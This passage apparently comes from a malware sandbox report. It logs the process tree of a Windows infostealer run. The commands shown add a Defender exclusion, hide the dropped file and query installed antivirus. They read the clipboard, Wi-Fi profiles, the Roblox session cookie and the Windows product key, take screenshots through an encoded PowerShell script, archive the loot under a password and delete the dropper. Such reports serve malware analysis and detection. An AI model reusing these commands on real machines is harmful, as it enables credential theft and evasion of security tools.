    - Hide Artifacts: Hidden Files and Directories
    - Suspicious use of WriteProcessMemory
    PID:4720
  - - C:\Windows\system32\attrib.exe
      attrib +h +s "C:\Users\Admin\AppData\Local\Temp\blank.exe"
      4⤵
      Views/modifies file attributes
      PID:2596
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5052
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:4364
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1332
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:3840
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4368
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:1804
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4460
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      PID:3992
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    PID:4488
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      Suspicious behavior: EnumeratesProcesses
      PID:3292
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4816
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:1464
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:3760
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:60
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
    3⤵
    - System Network Configuration Discovery: Wi-Fi Discovery
    PID:1948
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profile
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:3936
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    PID:212
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:1748
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
    3⤵
    PID:216
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
      4⤵
      PID:916
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
    3⤵
    PID:4244
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:5100
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\looptmz4\looptmz4.cmdline"
        5⤵
        
        PID:2704
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES96C2.tmp" "c:\Users\Admin\AppData\Local\Temp\looptmz4\CSCB6AAF883E8E0452BA1F19163FB1FD049.TMP"
        6⤵
        
        PID:1104
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:3640
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:4784
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
    3⤵
    PID:3360
  - - C:\Windows\system32\attrib.exe
      attrib -r C:\Windows\System32\drivers\etc\hosts
      4⤵
      Drops file in Drivers directory
      Views/modifies file attributes
      PID:2788
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:4656
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:4336
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:2140
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:244
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
    3⤵
    PID:3712
  - - C:\Windows\system32\attrib.exe
      attrib +r C:\Windows\System32\drivers\etc\hosts
      4⤵
      Drops file in Drivers directory
      Views/modifies file attributes
      PID:3288
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:4228
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:608
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:1100
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:1180
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:4328
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:5072
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:5008
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:4824
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:2124
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:4336
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "getmac"
    3⤵
    PID:3060
  - - C:\Windows\system32\getmac.exe
      getmac
      4⤵
      PID:692
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI22962\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\bfQnR.zip" *"
    3⤵
    PID:5004
  - - C:\Users\Admin\AppData\Local\Temp\_MEI22962\rar.exe
      C:\Users\Admin\AppData\Local\Temp\_MEI22962\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\bfQnR.zip" *
      4⤵
      Executes dropped EXE
      PID:540
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic os get Caption"
    3⤵
    PID:3396
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic os get Caption
      4⤵
      PID:3868
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
    3⤵
    PID:3140
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic computersystem get totalphysicalmemory
      4⤵
      PID:756
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    PID:264
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      PID:4932
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
    3⤵
    PID:3416
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:820
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    PID:3508
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:2288
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
    3⤵
    PID:3020
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:3528
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\Admin\AppData\Local\Temp\blank.exe""
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    PID:1472
  - - C:\Windows\system32\PING.EXE
      ping localhost -n 3
      4⤵
      System Network Configuration Discovery: Internet Connection Discovery
      Runs ping.exe
      PID:4060

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
1⤵
- Checks SCSI registry key(s)
- Checks processor information in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4968

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:2448

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
PID:5052
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffc81fccc40,0x7ffc81fccc4c,0x7ffc81fccc58
  2⤵
  PID:3604
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1880,i,17093032045741936111,4551823720248474709,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1872 /prefetch:2
  2⤵
  PID:2344
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2092,i,17093032045741936111,4551823720248474709,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2204 /prefetch:3
  2⤵
  PID:4940
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2268,i,17093032045741936111,4551823720248474709,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2484 /prefetch:8
  2⤵
  PID:2540
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3140,i,17093032045741936111,4551823720248474709,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3160 /prefetch:1
  2⤵
  PID:1080
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3328,i,17093032045741936111,4551823720248474709,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3352 /prefetch:1
  2⤵
  PID:916
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4580,i,17093032045741936111,4551823720248474709,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4516 /prefetch:1
  2⤵
  PID:4868
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4388,i,17093032045741936111,4551823720248474709,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4856 /prefetch:8
  2⤵
  PID:2136
- C:\Program Files\Google\Chrome\Application\123.0.6312.123\Installer\setup.exe
  "C:\Program Files\Google\Chrome\Application\123.0.6312.123\Installer\setup.exe" --reenable-autoupdates --system-level
  2⤵
  - Drops file in Program Files directory
  PID:4948
- - C:\Program Files\Google\Chrome\Application\123.0.6312.123\Installer\setup.exe
    "C:\Program Files\Google\Chrome\Application\123.0.6312.123\Installer\setup.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Program Files\Crashpad" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x298,0x29c,0x2a0,0x274,0x2a4,0x7ff6f1224698,0x7ff6f12246a4,0x7ff6f12246b0
    3⤵
    - Drops file in Program Files directory
    PID:2708
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4936,i,17093032045741936111,4551823720248474709,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4972 /prefetch:8
  2⤵
  PID:4316
- C:\Program Files\Google\Chrome\Application\chrome.exe
